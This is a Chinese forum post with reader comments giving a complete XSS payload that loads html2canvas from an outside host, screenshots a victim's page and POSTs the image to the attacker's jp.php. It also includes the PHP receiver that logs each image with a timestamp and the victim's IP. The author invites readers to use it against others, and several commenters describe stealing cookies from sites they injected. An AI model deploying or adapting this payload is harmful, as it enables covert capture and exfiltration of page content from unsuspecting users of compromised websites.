利用XSS截取屏幕截图
文章来源:y35u
2个月前,长短短(Sogili)在群里发了一个html2canvas.js 并给了一个POC
我写了一个完整的js来获得对方的屏幕截图
看代码
document.write("<script src=\"http:\/\/xj.hk\/html2canvas.js\"><\/script>"); <br>//调用截屏核心功能js,下载地址:http://xj.hk/html2canvas.js
window.onload=function(){
html2canvas(document.body, {
onrendered: function(canvas) {
//下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用post
xhr=function(){
var request = false;
if(window.XMLHttpRequest){
request = new XMLHttpRequest();
}else if (window.ActiveXObject){
try{
request = new window.ActiveXObject('Microsoft.XMLHTTP');
}catch(e){
}
}
return request;
}();
request = function(method,src,argv,content_type){
xhr.open(method,src,false);
if(method=='POST')xhr.setRequestHeader('Content-type',content_type);
xhr.send(argv); //发送POST数据
return xhr.responseText;
};
attack_a = function(){
var src = "http://xj.hk/jp.php"; //post接收地址
var argv_0 = "'&screenshot="+canvas.toDataURL(); //post字段名称为screenshot
request("POST",src,argv_0,"application/x-www-form-urlencoded");
};
attack_a();
}
});
}当然,你也可以直接把这个保存为1.js,去x别人
下面就说接收端了,很简单,上面的js,把数据发送给了
http://xj.hk/jp.php我们就做一个jp.php
代码如下
<?php
$screenshot=$_POST['screenshot'];
$fp=fopen("xss.txt", "at");
fputs($fp, "TIME: ".date("Y/m/d H:i:s")." IP: ".$_SERVER['REMOTE_ADDR']." image : ".$screenshot." \n");
fclose($fp);
?>看到了 很长很长的一段data
我们把这个data复制,并放入火狐的url中去访问,就能看到被x的人的屏幕截图咯
关于作者
评论150次
好牛掰,能连续截图就远控了
嗯 不错 好叼的思路
感觉算赌RP的东西
前端大有可为啊 不过截图是只截图当时的桌面还是?
XSS除了截取cookies 还可以截取受害者屏幕了
这不科学啊..
XSS真是越来真强大了,学xi了···
感谢楼主分享 谢谢了
很有用啊。。。。
xss太强大了, 去年到现在只插过3个站, 都收到了cookie .但是登录不了后台. 就不玩了.
感觉好神奇啊..
挺有意思的哈。。。。。
求赐个xj.hk的邀请码。。
谢谢分享啦。
xssshell里貌似基本所有xss能干的事都有了
呵呵,测试下去
Very Nice~~~!
MARK 能连续截吗?
有没有保持连接,查看浏览器的poc,保持连接就是关闭页面,而js作用仍保持,可以起到保持会话的功能。
这样可以?